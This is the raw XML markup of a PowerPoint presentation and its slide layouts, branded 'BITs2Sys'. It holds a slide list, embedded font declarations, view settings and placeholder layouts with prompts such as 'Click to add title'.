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71"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId3"/>
    <p:sldId id="257" r:id="rId4"/>
    <p:sldId id="258" r:id="rId6"/>
    <p:sldId id="299" r:id="rId7"/>
    <p:sldId id="302" r:id="rId8"/>
    <p:sldId id="303" r:id="rId9"/>
    <p:sldId id="306" r:id="rId10"/>
    <p:sldId id="307" r:id="rId11"/>
    <p:sldId id="308" r:id="rId12"/>
    <p:sldId id="309" r:id="rId13"/>
    <p:sldId id="310" r:id="rId14"/>
    <p:sldId id="323" r:id="rId15"/>
    <p:sldId id="300" r:id="rId16"/>
    <p:sldId id="304" r:id="rId17"/>
    <p:sldId id="313" r:id="rId18"/>
    <p:sldId id="314" r:id="rId19"/>
    <p:sldId id="311" r:id="rId20"/>
    <p:sldId id="318" r:id="rId21"/>
    <p:sldId id="364" r:id="rId22"/>
    <p:sldId id="319" r:id="rId23"/>
    <p:sldId id="315" r:id="rId24"/>
    <p:sldId id="316" r:id="rId25"/>
    <p:sldId id="317" r:id="rId26"/>
    <p:sldId id="320" r:id="rId27"/>
    <p:sldId id="324" r:id="rId28"/>
    <p:sldId id="326" r:id="rId29"/>
    <p:sldId id="321" r:id="rId30"/>
    <p:sldId id="322" r:id="rId31"/>
    <p:sldId id="327" r:id="rId32"/>
    <p:sldId id="312" r:id="rId33"/>
    <p:sldId id="328" r:id="rId34"/>
    <p:sldId id="329" r:id="rId35"/>
    <p:sldId id="331" r:id="rId36"/>
    <p:sldId id="332" r:id="rId37"/>
    <p:sldId id="345" r:id="rId38"/>
    <p:sldId id="330" r:id="rId39"/>
    <p:sldId id="344" r:id="rId40"/>
    <p:sldId id="346" r:id="rId41"/>
    <p:sldId id="347" r:id="rId42"/>
    <p:sldId id="348" r:id="rId43"/>
    <p:sldId id="349" r:id="rId44"/>
    <p:sldId id="350" r:id="rId45"/>
    <p:sldId id="351" r:id="rId46"/>
    <p:sldId id="352" r:id="rId47"/>
    <p:sldId id="353" r:id="rId48"/>
    <p:sldId id="354" r:id="rId49"/>
    <p:sldId id="355" r:id="rId50"/>
    <p:sldId id="356" r:id="rId51"/>
    <p:sldId id="357" r:id="rId52"/>
    <p:sldId id="358" r:id="rId53"/>
    <p:sldId id="359" r:id="rId54"/>
    <p:sldId id="360" r:id="rId55"/>
    <p:sldId id="361" r:id="rId56"/>
    <p:sldId id="301" r:id="rId57"/>
    <p:sldId id="305" r:id="rId58"/>
    <p:sldId id="333" r:id="rId59"/>
    <p:sldId id="337" r:id="rId60"/>
    <p:sldId id="334" r:id="rId61"/>
    <p:sldId id="336" r:id="rId62"/>
    <p:sldId id="338" r:id="rId63"/>
    <p:sldId id="335" r:id="rId64"/>
    <p:sldId id="339" r:id="rId65"/>
    <p:sldId id="340" r:id="rId66"/>
    <p:sldId id="341" r:id="rId67"/>
    <p:sldId id="366" r:id="rId68"/>
    <p:sldId id="367" r:id="rId69"/>
    <p:sldId id="260" r:id="rId70"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="JetBrains Mono" panose="02000009000000000000" charset="0"/>
      <p:regular r:id="rId75"/>
      <p:bold r:id="rId76"/>
      <p:italic r:id="rId77"/>
      <p:boldItalic r:id="rId78"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
      <p:regular r:id="rId79"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Calibri" panose="020F0502020204030204" charset="0"/>
      <p:regular r:id="rId80"/>
      <p:bold r:id="rId81"/>
      <p:italic r:id="rId82"/>
      <p:boldItalic r:id="rId83"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="等线" panose="02010600030101010101" charset="-122"/>
      <p:regular r:id="rId84"/>
    </p:embeddedFont>
  </p:embeddedFontLst>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689" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="5" orient="horz" pos="3974" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="6" orient="horz" pos="3864" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="7"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4301" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" showGuides="1">
      <p:cViewPr>
        <p:scale>
          <a:sx n="75" d="100"/>
          <a:sy n="75" d="100"/>
        </p:scale>
        <p:origin x="1899" y="279"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="689"/>
        <p:guide orient="horz" pos="3974"/>
        <p:guide orient="horz" pos="3864"/>
        <p:guide pos="3801"/>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p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="59" d="100"/>
          <a:sy n="59" d="100"/>
        </p:scale>
        <p:origin x="2517" y="1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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="tags/tag1.xml"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font10.fntdata"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font9.fntdata"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font8.fntdata"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font7.fntdata"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font6.fntdata"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide5.xml"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font5.fntdata"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font4.fntdata"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font3.fntdata"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font2.fntdata"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font1.fntdata"/><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23481F-9C3C-43D7-90C7-EB1A27D547E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9E64D8-EEBF-48B9-91B2-83B08DE2D2AC}"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E16C2-E655-40A9-A15C-8E8419011105}"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69313-2D9F-4019-9186-E48C7C04435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D369313-2D9F-4019-9186-E48C7C044353}"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V="1">
            <a:off x="0" y="11547"/>
            <a:ext cx="12192000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11220450" y="797719"/>
            <a:ext cx="298450" cy="234608"/>
            <a:chOff x="11040268" y="797719"/>
            <a:chExt cx="478632" cy="234608"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Rectangle: Rounded Corners 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11040268" y="797719"/>
              <a:ext cx="478632" cy="648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sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rectangle: Rounded Corners 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11040268" y="967456"/>
              <a:ext cx="478632" cy="64871"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 5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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="660398" y="1497031"/>
            <a:ext cx="8724902" cy="2507817"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="6000"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Click to add title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="660400" y="4453591"/>
            <a:ext cx="10858500" cy="508703"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent1"/>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent2">
                  <a:alpha val="0"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ct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add subtitle</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 4294967294"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7001013" y="5859780"/>
            <a:ext cx="4517887" cy="274320"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Presenter name</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本占位符 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="660398" y="5859780"/>
            <a:ext cx="4517887" cy="274320"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>BITs2Sys</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8" descr="徽标&#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5460" t="6258" r="5285" b="5520"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="360000" y="360000"/>
            <a:ext cx="723496" cy="720000"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:hf sldNum="0"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3627" y="173990"/>
            <a:ext cx="10858500" cy="900112"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Click to add title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="660400" y="1264204"/>
            <a:ext cx="10858500" cy="4869896"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Click to add text</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{43A25592-9C3F-48AB-9A3F-F2A64B129A6F}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>BITs2Sys</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder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matchingName="Agenda">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0400" y="1500187"/>
            <a:ext cx="2836562" cy="915667"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="2400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Agenda</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3745078" y="1500188"/>
            <a:ext cx="7773821" cy="4633912"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>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ltLang="zh-CN"/>
              <a:t>Click to add text</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Date Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{43A25592-9C3F-48AB-9A3F-F2A64B129A6F}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>BITs2Sys</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C8BB1146-E542-4D4E-B8E9-6919A11DDD48}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Connector 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3621019" y="1500188"/>
            <a:ext cx="0" cy="4633913"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCC00"/>
          </a:solidFill>
          <a:ln w="3175" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Freeform: Shape 8"/>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2"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>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V="1">
            <a:off x="0" y="11547"/>
            <a:ext cx="12192000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11220450" y="797719"/>
            <a:ext cx="298450" cy="234608"/>
            <a:chOff x="11040268" y="797719"/>
            <a:chExt cx="478632" cy="234608"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rectangle: Rounded Corners 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11040268" y="797719"/>
              <a:ext cx="478632" cy="648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sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rectangle: Rounded Corners 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11040268" y="967456"/>
              <a:ext cx="478632" cy="64871"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 5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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3368675" y="2568601"/>
            <a:ext cx="5435600" cy="987399"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="2400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Click to add title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3375025" y="3556000"/>
            <a:ext cx="5435600" cy="2578100"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">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add text</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{43A25592-9C3F-48AB-9A3F-F2A64B129A6F}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>BITs2Sys</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C8BB1146-E542-4D4E-B8E9-6919A11DDD48}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10" descr="徽标&#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5460" t="6258" r="5285" b="5520"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="360000" y="360000"/>
            <a:ext cx="723496" cy="720000"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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2722" y="173990"/>
            <a:ext cx="10858500" cy="900112"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Click to add title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Date Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{43A25592-9C3F-48AB-9A3F-F2A64B129A6F}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>BITs2Sys</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>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A25592-9C3F-48AB-9A3F-F2A64B129A6F}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>BITs2Sys</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder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matchingName="Closing">
  <p:cSld name="Closin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flipV="1">
            <a:off x="0" y="11547"/>
            <a:ext cx="12192000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11220450" y="797719"/>
            <a:ext cx="298450" cy="234608"/>
            <a:chOff x="11040268" y="797719"/>
            <a:chExt cx="478632" cy="234608"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Rectangle: Rounded Corners 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11040268" y="797719"/>
              <a:ext cx="478632" cy="648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sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rectangle: Rounded Corners 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11040268" y="967456"/>
